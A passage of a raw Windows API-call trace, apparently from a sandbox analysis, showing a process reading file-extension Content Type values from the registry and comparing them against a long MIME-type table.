(in: hKey=0x80000000, dwIndex=0x120d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509CertificateRequestCertificate.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x120e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509CertificateRequestCmc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x120f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509CertificateRequestCmc.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2=".", cchCount2=1) returned 1 [0103.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".386", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.669] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".386", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.669] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.669] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".3g2", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.669] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".3g2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.669] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x18) returned 0x0 [0103.670] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a539c, lpcbData=0x19fc20*=0x18 | out: lpType=0x19fc10*=0x1, lpData="video/3gpp2", lpcbData=0x19fc20*=0x18) returned 0x0 [0103.670] CharLowerBuffW (in: lpsz="video/3gpp2", cchLength=0xb | out: lpsz="video/3gpp2") returned 0xb [0103.670] CharLowerBuffW (in: lpsz=".3g2", cchLength=0x4 | out: lpsz=".3g2") returned 0x4 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml=animation/narrative", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac=audio/mp4", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif=audio/x-aiff", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc=audio/x-aiff", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aiff=audio/x-aiff", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".au=audio/basic", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm=audio/x-gsm", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar=audio/midi", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u=audio/mpegurl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a=audio/x-mpg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid=audio/midi", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".midi=audio/midi", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpega=audio/x-mpg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2=audio/x-mpg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3=audio/x-mpg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpga=audio/x-mpg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u=audio/x-mpegurl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls=audio/x-scpls", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp=audio/vnd.qcelp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ra=audio/x-realaudio", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram=audio/x-pn-realaudio", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rm=audio/x-pn-realaudio", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2=audio/x-sd2", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid=audio/prs.sid", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd=audio/basic", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav=audio/x-wav", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax=audio/x-ms-wax", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wma=audio/x-ms-wma", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".art=image/x-jg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp=image/bmp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdr=image/x-coreldraw", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdt=image/x-coreldrawtemplate", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpt=image/x-corelphotopaint", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".djv=image/vnd.djvu", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".djvu=image/vnd.djvu", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif=image/gif", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ief=image/ief", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico=image/x-icon", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jng=image/x-jng", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg=image/jpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpeg=image/jpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpe=image/jpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pat=image/x-coreldrawpattern", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pcx=image/pcx", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pbm=image/x-portable-bitmap", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pgm=image/x-portable-graymap", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pict=image/x-pict", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png=image/x-png", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pnm=image/x-portable-anymap", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pntg=image/x-macpaint", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppm=image/x-portable-pixmap", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".psd=image/x-psd", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qtif=image/x-quicktime", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ras=image/x-cmu-raster", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rf=image/vnd.rn-realflash", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rgb=image/x-rgb", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rp=image/vnd.rn-realpix", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sgi=image/x-sgi", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".svg=image/svg+xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".svgz=image/svg+xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".targa=image/x-targa", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".tif=image/x-tiff", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wbmp=image/vnd.wap.wbmp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".webp=image/webp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xbm=image/xbm", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xbm=image/x-xbitmap", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xpm=image/x-xpixmap", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xwd=image/x-xwindowdump", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".323=text/h323", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 1 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xml=text/xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".uls=text/iuls", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".txt=text/plain", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtx=text/richtext", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wsc=text/scriptlet", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rt=text/vnd.rn-realtext", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".htt=text/webviewhtml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".htc=text/x-component", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".vcf=text/x-vcard", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf=video/x-ms-asf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx=video/x-ms-asf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi=video/x-msvideo", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dl=video/dl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dv=video/dv", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flc=video/flc", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fli=video/fli", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gl=video/gl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lsf=video/x-la-asf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lsx=video/x-la-asf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mng=video/x-mng", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2=video/mpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3=video/mpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4=video/mpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpeg=video/x-mpeg2a", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpa=video/mpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpe=video/mpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpg=video/mpeg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ogv=video/ogg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".moov=video/quicktime", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mov=video/quicktime", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mxu=video/vnd.mpegurl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qt=video/quicktime", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qtc=video/x-qtc", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rv=video/vnd.rn-realvideo", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ivf=video/x-ivf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".webm=video/webm", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wm=video/x-ms-wm", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmp=video/x-ms-wmp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmv=video/x-ms-wmv", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmx=video/x-ms-wmx", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wvx=video/x-ms-wvx", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rms=video/vnd.rn-realvideo-secure", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx=video/x-ms-asf-plugin", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".movie=video/x-sgi-movie", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".7z=application/x-7z-compressed", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".a=application/x-archive", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aab=application/x-authorware-bin", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aam=application/x-authorware-map", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aas=application/x-authorware-seg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".abw=application/x-abiword", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ace=application/x-ace-compressed", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ai=application/postscript", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".alz=application/x-alz-compressed", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ani=application/x-navi-animation", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".arj=application/x-arj", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf=application/vnd.ms-asf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bat=application/x-msdos-program", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bcpio=application/x-bcpio", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".boz=application/x-bzip2", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bz=application/x-bzip", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bz2=application/x-bzip2", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cab=application/vnd.ms-cab-compressed", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cat=application/vnd.ms-pki.seccat", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ccn=application/x-cnc", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cco=application/x-cocoa", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdf=application/x-cdf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cer=application/x-x509-ca-cert", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chm=application/vnd.ms-htmlhelp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chrt=application/vnd.kde.kchart", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cil=application/vnd.ms-artgalry", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".class=application/java-vm", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".com=application/x-msdos-program", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".clp=application/x-msclip", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpio=application/x-cpio", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpt=application/mac-compactpro", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cqk=application/x-calquick", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crd=application/x-mscardfile", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crl=application/pkix-crl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csh=application/x-csh", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dar=application/x-dar", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dbf=application/x-dbase", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dcr=application/x-director", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".deb=application/x-debian-package", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dir=application/x-director", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dist=vnd.apple.installer+xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".distz=vnd.apple.installer+xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dll=application/x-msdos-program", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dmg=application/x-apple-diskimage", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc=application/msword", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dot=application/msword", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dvi=application/x-dvi", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 